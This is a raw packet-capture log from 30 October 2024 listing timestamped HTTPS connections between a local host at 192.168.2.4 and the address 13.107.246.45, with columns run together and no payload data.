Oct 30, 2024 03:47:01.400669098 CET4434992013.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.400729895 CET49920443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.400849104 CET49920443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.400855064 CET4434992013.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.810019970 CET4434991613.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.811067104 CET49916443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.811106920 CET4434991613.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.811508894 CET49916443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.811522961 CET4434991613.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.813242912 CET4434991713.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.813952923 CET49917443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.813973904 CET4434991713.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.814389944 CET49917443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.814395905 CET4434991713.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.839879990 CET4434991813.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.840744019 CET49918443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.840763092 CET4434991813.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.841159105 CET49918443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.841170073 CET4434991813.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.862391949 CET4434991913.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.863461971 CET49919443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.863477945 CET4434991913.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.863847971 CET49919443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.863852978 CET4434991913.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.940685987 CET4434991613.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.940732956 CET4434991613.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.940773010 CET4434991613.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.940829992 CET49916443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.940890074 CET49916443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.941031933 CET49916443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.941066027 CET4434991613.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.941095114 CET49916443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.941112041 CET4434991613.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.942222118 CET4434991713.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.942246914 CET4434991713.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.942298889 CET49917443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.942301989 CET4434991713.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.942343950 CET49917443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.942478895 CET49917443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.942487955 CET4434991713.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.942497969 CET49917443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.942502975 CET4434991713.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.944878101 CET49921443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.944906950 CET4434992113.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.944978952 CET49921443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.945878983 CET49922443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.945916891 CET4434992213.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.945976973 CET49922443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.946166039 CET49921443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.946177959 CET4434992113.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.946259975 CET49922443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.946275949 CET4434992213.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.968928099 CET4434991813.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.969002008 CET4434991813.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.969099998 CET49918443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.969324112 CET49918443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.969347954 CET4434991813.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.969372988 CET49918443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.969386101 CET4434991813.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.971615076 CET49923443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.971636057 CET4434992313.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.971714973 CET49923443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.971837044 CET49923443192.168.2.413.107.246.45
Oct 30, 2024 03:47:01.971851110 CET4434992313.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.993822098 CET4434991913.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.993889093 CET4434991913.107.246.45192.168.2.4
Oct 30, 2024 03:47:01.993956089 CET49919443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.026791096 CET49919443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.026806116 CET4434991913.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.026815891 CET49919443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.026823044 CET4434991913.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.070784092 CET49924443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.070831060 CET4434992413.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.070899963 CET49924443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.084965944 CET49924443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.084983110 CET4434992413.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.137887001 CET4434992013.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.179866076 CET49920443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.179881096 CET4434992013.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.180326939 CET49920443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.180332899 CET4434992013.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.305660009 CET4434992013.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.305767059 CET4434992013.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.305844069 CET49920443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.465150118 CET49920443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.465150118 CET49920443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.465163946 CET4434992013.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.465174913 CET4434992013.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.666107893 CET4434992113.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.674513102 CET4434992213.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.702516079 CET49925443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.702542067 CET4434992513.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.702614069 CET49925443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.703335047 CET49921443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.703357935 CET4434992113.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.703758955 CET49921443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.703766108 CET4434992113.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.704046965 CET49922443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.704071999 CET4434992213.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.704421997 CET49922443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.704428911 CET4434992213.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.705491066 CET49925443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.705507994 CET4434992513.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.898334026 CET4434992313.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.899014950 CET49923443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.899034023 CET4434992313.107.246.45192.168.2.4
Oct 30, 2024 03:47:02.900077105 CET49923443192.168.2.413.107.246.45
Oct 30, 2024 03:47:02.900084972 CET4434992313.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.014504910 CET4434992113.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.014532089 CET4434992113.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.014584064 CET4434992113.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.014609098 CET49921443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.014659882 CET49921443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.014874935 CET49921443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.014915943 CET4434992113.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.014941931 CET49921443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.014957905 CET4434992113.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.017245054 CET4434992213.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.017432928 CET4434992213.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.017535925 CET49922443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.017535925 CET49922443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.017570019 CET49922443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.017587900 CET4434992213.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.017762899 CET49926443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.017792940 CET4434992613.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.017858982 CET49926443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.017988920 CET49926443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.017997980 CET4434992613.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.019623995 CET49927443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.019653082 CET4434992713.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.019723892 CET49927443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.019850969 CET49927443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.019861937 CET4434992713.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.029062986 CET4434992413.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.029465914 CET49924443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.029473066 CET4434992413.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.029898882 CET49924443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.029902935 CET4434992413.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.033788919 CET4434992313.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.034050941 CET4434992313.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.034096003 CET4434992313.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.034110069 CET49923443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.034154892 CET49923443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.034209967 CET49923443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.034209967 CET49923443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.034228086 CET4434992313.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.034249067 CET4434992313.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.036236048 CET49928443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.036267042 CET4434992813.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.036341906 CET49928443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.036468983 CET49928443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.036483049 CET4434992813.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.166789055 CET4434992413.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.166960001 CET4434992413.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.167052031 CET49924443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.167200089 CET49924443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.167200089 CET49924443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.167206049 CET4434992413.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.167212963 CET4434992413.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.170478106 CET49929443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.170500040 CET4434992913.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.170593023 CET49929443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.170774937 CET49929443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.170787096 CET4434992913.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.624039888 CET4434992513.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.624548912 CET49925443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.624566078 CET4434992513.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.625159979 CET49925443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.625166893 CET4434992513.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.753001928 CET4434992513.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.753050089 CET4434992513.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.753106117 CET4434992513.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.753118038 CET49925443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.753165007 CET49925443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.753418922 CET49925443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.753426075 CET4434992513.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.753436089 CET49925443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.753439903 CET4434992513.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.755480051 CET4434992613.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.755944014 CET49926443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.755961895 CET4434992613.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.756620884 CET49926443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.756628990 CET4434992613.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.756922007 CET49930443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.756953001 CET4434993013.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.757036924 CET49930443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.757201910 CET49930443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.757215977 CET4434993013.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.767254114 CET4434992813.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.767755032 CET49928443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.767765045 CET4434992813.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.768297911 CET49928443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.768302917 CET4434992813.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.795056105 CET4434992713.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.795537949 CET49927443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.795551062 CET4434992713.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.796222925 CET49927443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.796226978 CET4434992713.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.886634111 CET4434992613.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.886723042 CET4434992613.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.886790991 CET49926443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.886989117 CET49926443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.887003899 CET4434992613.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.887018919 CET49926443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.887026072 CET4434992613.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.890435934 CET49931443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.890460014 CET4434993113.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.890562057 CET49931443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.890729904 CET49931443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.890742064 CET4434993113.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.898868084 CET4434992813.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.898930073 CET4434992813.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.898968935 CET49928443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.900851011 CET49928443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.900860071 CET4434992813.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.900886059 CET49928443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.900891066 CET4434992813.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.903230906 CET49932443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.903294086 CET4434993213.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.903374910 CET49932443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.903505087 CET49932443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.903537035 CET4434993213.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.929717064 CET4434992713.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.930171013 CET4434992713.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.930250883 CET49927443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.930318117 CET49927443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.930327892 CET4434992713.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.930336952 CET49927443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.930344105 CET4434992713.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.932771921 CET49933443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.932806969 CET4434993313.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.932868004 CET49933443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.933022976 CET49933443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.933036089 CET4434993313.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.938260078 CET4434992913.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.938728094 CET49929443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.938745975 CET4434992913.107.246.45192.168.2.4
Oct 30, 2024 03:47:03.939456940 CET49929443192.168.2.413.107.246.45
Oct 30, 2024 03:47:03.939462900 CET4434992913.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.073730946 CET4434992913.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.073892117 CET4434992913.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.073983908 CET49929443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.074068069 CET49929443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.074080944 CET4434992913.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.074093103 CET49929443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.074099064 CET4434992913.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.077033043 CET49934443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.077089071 CET4434993413.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.077183008 CET49934443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.077334881 CET49934443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.077349901 CET4434993413.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.484154940 CET4434993013.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.484668016 CET49930443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.484694958 CET4434993013.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.485254049 CET49930443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.485260963 CET4434993013.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.612977028 CET4434993013.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.613053083 CET4434993013.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.613234043 CET49930443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.613292933 CET49930443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.613310099 CET4434993013.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.613318920 CET49930443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.613325119 CET4434993013.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.616569996 CET49935443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.616594076 CET4434993513.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.616657019 CET49935443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.616872072 CET49935443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.616885900 CET4434993513.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.638304949 CET4434993113.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.640958071 CET49931443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.640990019 CET4434993113.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.641557932 CET49931443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.641566038 CET4434993113.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.662867069 CET4434993213.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.663353920 CET49932443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.663371086 CET4434993213.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.663878918 CET49932443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.663885117 CET4434993213.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.683877945 CET4434993313.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.684298992 CET49933443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.684314966 CET4434993313.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.684688091 CET49933443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.684693098 CET4434993313.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.785686016 CET4434993113.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.785939932 CET4434993113.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.785993099 CET4434993113.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.785999060 CET49931443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.786057949 CET49931443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.786127090 CET49931443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.786147118 CET4434993113.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.786161900 CET49931443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.786170006 CET4434993113.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.789757013 CET49936443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.789783955 CET4434993613.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.789863110 CET49936443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.790019989 CET49936443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.790035009 CET4434993613.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.794766903 CET4434993213.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.794826031 CET4434993213.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.794889927 CET49932443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.794976950 CET49932443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.794991016 CET4434993213.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.795002937 CET49932443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.795007944 CET4434993213.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.797112942 CET49937443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.797146082 CET4434993713.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.797209978 CET49937443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.797419071 CET49937443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.797432899 CET4434993713.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.815642118 CET4434993313.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.815707922 CET4434993313.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.815771103 CET49933443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.815784931 CET4434993313.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.815824986 CET4434993313.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.815875053 CET49933443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.815977097 CET49933443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.815989971 CET4434993313.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.816001892 CET49933443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.816006899 CET4434993313.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.818301916 CET49938443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.818321943 CET4434993813.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.818392038 CET49938443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.818505049 CET49938443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.818511009 CET4434993813.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.823888063 CET4434993413.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.824306011 CET49934443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.824316025 CET4434993413.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.824759007 CET49934443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.824764967 CET4434993413.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.958745956 CET4434993413.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.958813906 CET4434993413.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.958867073 CET49934443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.961179018 CET49934443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.961200953 CET4434993413.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.961219072 CET49934443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.961225033 CET4434993413.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.970112085 CET49939443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.970135927 CET4434993913.107.246.45192.168.2.4
Oct 30, 2024 03:47:04.970191956 CET49939443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.970539093 CET49939443192.168.2.413.107.246.45
Oct 30, 2024 03:47:04.970551014 CET4434993913.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.348156929 CET4434993513.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.348742962 CET49935443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.348768950 CET4434993513.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.349344969 CET49935443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.349351883 CET4434993513.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.478368044 CET4434993513.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.478401899 CET4434993513.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.478457928 CET49935443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.478461027 CET4434993513.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.478693962 CET49935443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.478713989 CET4434993513.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.478728056 CET49935443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.478734016 CET4434993513.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.478756905 CET49935443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.478760958 CET4434993513.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.481960058 CET49940443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.481987953 CET4434994013.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.482286930 CET49940443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.482451916 CET49940443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.482465982 CET4434994013.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.532059908 CET4434993713.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.532499075 CET49937443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.532517910 CET4434993713.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.533097982 CET49937443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.533103943 CET4434993713.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.559663057 CET4434993613.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.559686899 CET4434993813.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.560159922 CET49936443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.560180902 CET4434993613.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.560441971 CET49938443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.560451031 CET4434993813.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.560683012 CET49936443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.560689926 CET4434993613.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.560962915 CET49938443192.168.2.413.107.246.45
Oct 30, 2024 03:47:05.560969114 CET4434993813.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.662265062 CET4434993713.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.662300110 CET4434993713.107.246.45192.168.2.4
Oct 30, 2024 03:47:05.662354946 CET4434993713.107.246.45192.168.2.4
